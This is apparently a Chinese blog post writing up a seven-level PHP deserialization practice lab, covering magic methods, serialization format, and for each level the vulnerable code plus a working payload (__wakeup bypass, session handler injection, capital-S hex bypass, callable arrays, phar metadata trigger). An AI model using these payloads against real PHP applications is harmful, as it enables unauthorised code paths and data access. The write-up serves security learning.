unserialize入门练习

最新推荐文章于 2023-06-01 15:03:00 发布
最新推荐文章于 2023-06-01 15:03:00 发布
阅读量1k 收藏 9
点赞数 1
分类专栏: 安全/web 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/buzhimingderen/article/details/119962355
版权

知识点

必须知道的魔术方法

__construct(),类的构造函数
__destruct(),类的析构函数
__call(),在对象中调用一个不可访问方法时调用
__callStatic(),用静态方式中调用一个不可访问方法时调用
__get(),获得一个类的成员变量时调用
__set(),设置一个类的成员变量时调用
__isset(),当对不可访问属性调用isset()或empty()时调用
__unset(),当对不可访问属性调用unset()时被调用。
__sleep(),执行serialize()时,先会调用这个函数
__wakeup(),执行unserialize()时,先会调用这个函数
__toString(),类被当成字符串时的回应方法
__invoke(),调用函数的方式调用一个对象时的回应方法
__set_state(),调用var_export()导出类时,此静态方法会被调用。
__clone(),当对象复制完成时调用
__autoload(),尝试加载未定义的类
__debugInfo(),打印所需调试信息

  1. __construct():当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。

  2. __ wakeup() :unserialize()时会自动调用

  3. __destruct():当对象被销毁时会自动调用。

  4. __ toString():当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用

  5. __get() :当从不可访问的属性读取数据

  6. __call(): 在对象上下文中调用不可访问的方法时触发

__toString 触发的条件比较多,单独列出来:

(1)echo ($obj) / print($obj) 打印时会触发
(2)反序列化对象与字符串连接时
(3)反序列化对象参与格式化字符串时
(4)反序列化对象与字符串进行==比较时(PHP进行==比较的时候会转换参数类型)
(5)反序列化对象参与格式化SQL语句,绑定参数时
(6)反序列化对象在经过php字符串函数,如 strlen()、addslashes()时
(7)在in_array()方法中,第一个参数是反序列化对象,第二个参数的数组中有toString返回的字符串的时候toString会被调用
(8)反序列化的对象作为 class_exists() 的参数的时候

写一下序列化/反序列化的代码规范:

<?php
class just4fun{
	var $secret;
	var $enter;
}
# 序列化与反序列化范例
$o1=new just4fun(); # 实例化该类
$o1->secret='aaa'; # 给实例中的一些变量赋值
$o1_ser=serialize($o1); # 序列化该实例
print_r($o1_ser); # 输出序列化后的内容
echo("\n"); # 输出换行,必须用双引号
print_r(unserialize($o1_ser)); # 输出反序列化后的内容 
echo("\n");
echo("\n");
# 序列化与指向引用的结合使用
$o2=new just4fun();
$o2->enter=&$o2->secret; # 此处的enter的值是引用的secret的值,使用符号:&
$o2_ser=serialize($o2);
print_r($o2_ser);
echo("\n");
print_r(unserialize($o2_ser));
echo("\n");
?>
//$this在OOP中就是伪变量,(伪变量不是真正的变量,只是形式上是变量,变量中存储的是固定的值,$this中并没有,哪个对象调用,$this就代表哪个对象。)同时,也可以将$this理解为对象的引用,$this通过引用的形式访问一个对象的方法和属性

序列化格式中的字母含义:

a - array                    b - boolean  
d - double                   i - integer
o - common object            r - reference
s - string                   C - custom object
O - class                  N - null
R - pointer reference      U - unicode string

回调函数的概念

通俗的来说,回调函数是一个我们定义的函数,但是不是我们直接来调用,而是通过另一个函数来调用,这个函数通过接收回调函数的名字和参数来实现对它的调用。

反序列化靶场

第一关(__wakeup)

<?php 
class SoFun{ 
  protected $file='index.php';
  function __destruct(){
    if(!empty($this->file)) {
      if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)
        show_source(dirname (__FILE__).'/'.$this ->file);
      else
        die('Wrong filename.');
    }
  }  
  function __wakeup(){
   $this->file='index.php';
  } 
}     
if (!isset($_GET['tryhackme'])){ 
  show_source(__FILE__);
}
else{ 
  $a=$_GET['tryhackme']; 
  unserialize($a); 
}
 ?><!--key in flag1.php-->

代码审计:后台接收一个tryhackme参数,进行反序列化。__wakeup()会在反序列化(unserialize)的时候进行调用,将file属性赋值为index.php。这个并不是我们想要的,我们需要的在flag1.php里面。所以需要绕过__wakeup魔术方法。__wakeup()函数失效引发漏洞(CVE-2016-7124):漏洞影响版本PHP5 < 5.6.25

or PHP7 < 7.0.10

漏洞原理:__wakeup触发于unserilize()调用之前,但是如果被反序列话的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时使得__wakeup失效。

因此可以构造payload:

//其序列化原本属性为1,绕过__wwakeup将其改为了3
un1.php?tryhackme=O:5:"SoFun":3:{s:7:"%00*%00file";s:9:"flag1.php";}

另外提一下访问控制:

  • **public(公有):**公有的类成员可以在任何地方被访问。
  • **protected(受保护):**受保护的类成员则可以被其自身以及其子类和父类访问。
  • **private(私有):**私有的类成员则只能被其定义所在的类访问。

访问控制在序列化的时候有自己单独的格式(不可见字符)。private是在类名首尾加%00,protected则是在*两端加%00。

绕过之后即可获得flag:flag{1t'5_3@5y_t0_6yp@55_w@k34p}

第二关(Plus)

<?php
include "flag2.php"; 
class funny{
    function __wakeup(){
        global $flag;
        echo $flag;
    }
}
if (isset($_GET['tryhackme'])){
    $a = $_GET['tryhackme'];
    if(preg_match('/[oc]:\d+:/i', $a)){
        die("NONONO!");
    } else {
        unserialize($a);
    }
} else {
    show_source(__FILE__);
}

 ?>

这一关只要触发__wakeup魔术方法就可以拿到flag。只有一个正则函数preg_match(),只需要在对象长度前添加一个+号,即o:14->o:+14,这样就可以绕过正则匹配。

不过这里我有个疑问,我直接传递payload:

?tryhackme=O:+5:"funny":0:{}

并没有获取到flag,而是在进行了一次urlencode之后才拿到了flag,这里面又没有privateprotected,不解~~~。

flag:flag{p145_15_900d!}

第三关(Bypass)

<?php
include "flag3.php"; 
class funny{
    private $password;
    public $verify;
    function __wakeup(){
        global $nobodyknow;
        global $flag;
        $this->password = $nobodyknow;
        if ($this->password === $this->verify){
            echo $flag;
        } else {
            echo "浣犱笉澶鍟�??!";
        }
    }
}
if (isset($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
unserialize($a);
} else {
    show_source(__FILE__);
}
?>

这一关的核心就是需要:

$this->password === $this->verify

这个写法在最开始的代码规范里面就有写到,所以这里我就直接放我的代码了:

<?php
class funny{
    private $password;
    public $verify;
    function __construct(){
        $this->verify = &$this->password;
    }
}
$d = new funny();
$data = serialize($d);
echo $data;
echo urlencode($data);//因为这里有private所以进行一下url编码
?>

最后拿到flag:flag{7r1p13_3q4@1s_is_9reat!}

第四关(Session)

<?php
// goto un42.php
ini_set('session.serialize_handler','php_serialize');
session_start();
if (isset($_GET['tryhackme'])){
$_SESSION['tryhackme'] = $_GET['tryhackme'];
} else {
show_source(__FILE__);
}
?>

看到了session,直接想到了引擎不同导致的漏洞(使用不当产生)。先补充内容知识点:

php.ini中一些Session配置:
session.save_path="" --设置session的存储路径
session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.auto_start boolen--指定会话模块是否在请求开始时启动一个会话默认为0不启动
session.serialize_handler string--定义用来序列化/反序列化的处理器名字。默认使用php

处理器:
php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值

php:存储方式是,键名+竖线+经过serialize()函数序列处理的值

php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值
//这个便是在相应的处理器处理下,session所存储的格式。

然后话说回来,题目中告诉我们goto un42.php,访问查看

<?php
include "flag4.php"; 
ini_set('session.serialize_handler','php');
session_start();
class funny{
    public $a;
    function __destruct(){
        global $flag;
        echo $flag;
    }
}
show_source(__FILE__);
?>

果然获取flag的页面使用的是php而赋值页面则是php_serialize。代码审计知道,只要触发funny就可以拿到flag了。

构造payload:

|O:5:"funny":1:{s:1:"a";N;}

在赋值页面传入即可在获取flag的页面拿到flag了

flag:flag{53ssi0n_4ns3r@lize_is_very_e@sy}

第五关(Unserialize)

<?php
include "flag5.php";
class funny{
    private $a;
    function __construct() {
        $this->a = "givemeflag";
    }
    function __destruct() {
        global $flag;
        if ($this->a === "givemeflag") {
            echo $flag;
        }
    }
}

if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
for($i=0;$i<strlen($a);$i++)
{
    if (ord($a[$i]) < 32 || ord($a[$i]) > 126) {
        die("浣犲埌搴曡涓嶈鍟�");
    }
}
unserialize($a);
} else {
    show_source(__FILE__);
}
?>

代码审计知道,只要反序列化后$a=givemeflag就可以拿到flag。不过这一关有一个:

for($i=0;$i<strlen($a);$i++)
{
    if (ord($a[$i]) < 32 || ord($a[$i]) > 126) {
        die("浣犲埌搴曡涓嶈鍟�");
    }
}

类funny里的$a的访问控制是private显然%00在这里就会被过滤掉。但是在反序列化的数据类型里默认字符串使用的标识是小s,这里可以使用大S进行绕过。

**补充:**大写的S是可以支持十六进制编码(xx),并在反序列化的时候解析十六进制
所以构造payload:

?tryhackme=O:5:"funny":1:{S:8:"\00funny\00a";s:10:"givemeflag";}

获得flag :flag{7h3_61n@ry_5tr1n9_5_i5_int3r3sting}

第六关(Array)

<?php
include "flag6.php";
ini_set('display_errors',true);
error_reporting(E_ALL | E_STRICT); 
class funny{
    public function pyflag(){
        global $flag;
        echo $flag;
    }
}

if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = unserialize($_GET['tryhackme']);
$a();
} else {
    show_source(__FILE__);
}
?>

**考点:**php动态执行/调用函数/成员函数的能力,即使用变量名后加括号的方式来对函数进行调用。

举例1:

1. 定义一个函数
2. 将函数名(字符串)赋值给一个变量
3. 使用变量名代替函数名动态调用函数
例:
<?php
 function addition ($a, $b){
   echo ($a + $b), "\n";
 }
 $result = "addition";
 $result (1,2);
?>

举例2:动态调用函数:

<?php
function test1(){echo"a";}
function test2($x){echo $x;}
function test3($x,$y){echo $x.$y;}
call_user_func("test1");
call_user_func("test2","b");
call_user_func("test3","c","d");
?>

举例3:动态调用成员函数:

<?php
class A{

function test1(){echo"a";}
function test2($x){echo $x;}
function test3($x,$y){echo $x.$y;}
}
$obj=new A;
call_user_func(array($obj,"test1"));
call_user_func(array($obj,"test2"),"b");
call_user_func(array($obj,"test3"),"c","d");
?>

构造payload:

<?php
class funny{
    public function pyflag(){
        global $flag;
        echo $flag;
    }
}
$d = new funny();
$data=array($d,"pyflag");
$a = serialize($data);
echo $a;
?>

?tryhackme=a:2:{i:0;O:5:"funny":0:{}i:1;s:6:"pyflag";}

获得flag:flag{Arr@y_c@11_1n5t@nc3_m3th0d}

第七关(Phar)

<?php
include "flag7.php";
class funny{
    function __destruct() {
        global $flag;
        echo $flag;
    }
}

show_source(__FILE__);
if (isset($_GET['action'])) {
    $a = $_GET['action'];
    if ($a === "check") {
        $b = $_GET['file'];
        if (file_exists($b) && !empty($b)) {
            echo "$b is exist!";
        }
    } else if ($a === "upload") {
        if (!is_dir("./upload")){
            mkdir("./upload");
        }
        $filename = "./upload/".rand(1, 10000).".txt";
        if (isset($_GET['data'])){
            file_put_contents($filename, base64_decode($_GET['data']));
            echo "Your file path:$filename";
        }
    }
}
?>

这是一个phar伪协议触发的php反序列化。

审计代码:file_exists()函数参数可控,存在upload可以上传文件。满足phar伪协议触发php反序列化的利用条件。

构造:

<?php
    class funny{
    }
    $phar = new Phar("7.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("anyhead"."<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new funny();
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
    $data = file_get_contents('./7.phar');
    echo base64_encode($data);
?>

这里有个疑问,我查阅了好多的博客,基本都没有说明为什么。

$phar->setStub("anyhead"."<?php __HALT_COMPILER(); ?>");

这里的setStub里面我看常规的基本上分为三类:不带头、用gif头和这个anyhead。但是却没有说明为什么要用这个anyhead,我尝试不带头或者带gif文件的头这个题都做不出来。(虽然它的名字很好理解,但是我看到的师傅的博客描述都是说只需要保证结尾为__HALT_COMPILER();即可)

回到题目,得到:

YW55aGVhZDw/cGhwIF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KRgAAAAEAAAARAAAAAQAAAAAAEAAAAE86NToiZnVubnkiOjA6e30IAAAAdGVzdC50eHQEAAAALkwdYQQAAAAMfn/YtgEAAAAAAAB0ZXN00/o0rYD23J7lQlO6nsUa49DN2QcCAAAAR0JNQg==

先上传数据:

?action=upload&data=YW55aGVhZDw/cGhwIF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KRgAAAAEAAAARAAAAAQAAAAAAEAAAAE86NToiZnVubnkiOjA6e30IAAAAdGVzdC50eHQEAAAALkwdYQQAAAAMfn/YtgEAAAAAAAB0ZXN00/o0rYD23J7lQlO6nsUa49DN2QcCAAAAR0JNQg==

然后得到路径:./upload/7329.txt

利用phar伪协议访问:

?action=check&file=phar://./upload/7329.txt

得到flag:flag{pH4r_lS_4Unny!!}

参考学习链接

  1. https://www.cnblogs.com/bmjoker/p/13742666.html
  2. https://www.cnblogs.com/fish-pompom/p/11126473.html
  3. https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
zero_DAIDAI
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpunserialize返回false的解决方法
10-25
主要介绍了phpunserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
反序列化(Unserialize)漏洞详解
qq_49422880的博客
09-28 9227
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
unserialize3与反序列化漏洞零基础详解
sGanYu
09-08 2695
反序列化漏洞(序列化←→反序列化) 什么是序列化(serialize) 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串 什么是反序列化(unserialize) 将字符串转换为状态信息
unserialize反序列化漏洞
weixin_45634365的博客
03-27 642
一、序列化 序列化(serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区,之后可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单地说,就是将状态信息保存为字符串。例如,将PHP中的对象、类、数组、变量、匿名函数等转化为字符串,方便保存到数据库或者文件中。 反序列化: 序列化是将对象的状态信息转为字符串储存起来,反序列化就是将字符串转化为状态信息,即从新将状态信息拿出来使用。 ...
渗透测试基础 -unserialize反序列化漏洞
weixin_45488495的博客
05-04 870
渗透测试基础-unserialize反序列化漏洞什么是序列化什么是反序列化类 | 对象魔术方法反序列化靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 什么是序列化 serialize 为 序列化的意思 unserialize 为 取消 序列化,在这理解为反序列化 那先来说一下,什么是序列化?: 序列化(serialize)是将对象的状态信息转换为可以储存或传输的形式的过程。在序列化期间对象将其当前状态写入到临时
[CTFTraining] 0CTF 2016 Unserialize
ZXW_NUDT的博客
06-01 2399
[CTFTraining] 0CTF 2016 Unserialize
unserialize.php
11-08
unserialize.php
php serialize()与unserialize() 不完全研究
10-19
主要介绍了php serialize()与unserialize() 的一些区别,需要的朋友可以参考下
浅谈php serialize()与unserialize()的用法
10-27
本篇文章是对php中的serialize()与unserialize()的应用进行了详细的分析介绍,需要的朋友参考下
非常好用的两个PHP函数 serialize()和unserialize()
10-28
使用serialize()函数和unserialize()函数,这两个函数的用法真是绝配,一个是进行序列化存储,另一个则是进行序列化恢复,方便极了
学习周记(四)(上)
極品━═☆宏的博客
01-30 839
CTF_Web练习(二) 从1月13日至1月25日,差不多快两周的时间没有碰这个东西了。好在考完了期末考试,现在有时间了,也该干干正事了,提高提高自己的能力,做点题,写点自己的wp与体会吧,一定要在寒假的时间做到每天进步一点点。I 'm f***ing coming! 先写写自己的计划,一周的时间是七天,按照4、3分配,前四天中前两天做攻防世界的题,后两天做做其他平台的题;接下来的三天自己积累一...
php unserialize实例,php函数serialize()与unserialize()用法实例详解
weixin_39562234的博客
03-16 430
本节内容:php函数serialize()与unserialize()用法php函数serialize():这个函数作用就是序列化数据,返回一个可存储的字符串,该函数有利于存储或传递PHP的值,同时不丢失其类型和结构。在cms数据库中经常看到这样的结构。一般将复杂或者数据量多而没有必要分开存储的数据封装成一个多维数组通过serialize()转成字符串,然后存进数据库,需要时再拿出来转成数组再用,...
[强网杯 2019]Upload
qq_62046696的博客
12-17 896
except是一个数组,正好我们想要调用的这个public function upload_img()也是在同一个类中,那个我们给 index赋值 upload_img这个方法不就可以了吗。发现是序列化,那么肯定会有反序列化的地方目前还没遇到,也没提示的点了,扫一下目录,扫到了www.tar.gz。if($this->{$name}){//成为了这里的属性,而类中不存在index属性。//如果我们能控制,指定路径的目录名称,然后传一个图片码不就可以getshell了码。
关于unserialize绕过__wakeup
https://www.cnblogs.com/zpchcbd/
04-26 1448
unserialize 和 serialize的注意点: __construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) __destruct():当对象被销毁时会自动调用。(析构函数) __wakeup():unserialize() 时会自动调用。 DEMO class Demo { public $data; ...
php unserialize()函数,php函数serialize()与unserialize()用法实例
weixin_42519489的博客
03-16 293
本文实例讲述了php函数serialize()与unserialize()用法。分享给大家供大家参考。具体方法如下:该实例主要讲述了php函数serialize()与unserialize()说明及案例。想要将已序列化的字符串变回 PHP 的值,可使用unserialize()。serialize()可处理除了resource之外的任何类型。甚至可以serialize()那些包含了指向其自身引用的...
Web_php_unserialize
怪味巧克力的博客
05-25 3348
前言: 看到好的知识点就喜欢记录下来,一是为了方便自己以后复习,二是也能帮助大家了解知识点 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 。 首先拿到题目看到给出一段PHP源码 <?php class Demo { private $file = 'inde
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
newstar UnserializeOne(一道基础反序列化详解)
qq_55717276的博客
10-23 299
反序列化从后往前推
php-SER-libs-main反序列化靶场通关详细思路
qq_73767109的博客
05-30 3615
这里先是要把my类实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
unserialize
最新发布
08-29
unserialize函数是PHP中的一个函数,它用于将一个字符串表示的序列化对象转换回原始的PHP对象。当使用serialize函数将一个对象序列化为字符串后,可以使用unserialize函数将其还原为原始的对象。 在使用unserialize函数时,如果被反序列化的字符串中包含有特殊的魔术方法(magic methods)如__construct、__destruct、__wakeup等,这些方法会在对象被创建、销毁或者反序列化时自动调用。 反序列化的过程是非常有用的,可以在用户之间传递对象,或者将对象持久化存储到文件或数据库中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [浅谈php函数serialize()与unserialize()的使用方法](https://download.csdn.net/download/weixin_38726255/13043889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [反序列化(Unserialize)漏洞详解](https://blog.csdn.net/qq_49422880/article/details/120488517)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [渗透测试基础 -unserialize反序列化漏洞](https://blog.csdn.net/weixin_45488495/article/details/116403291)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值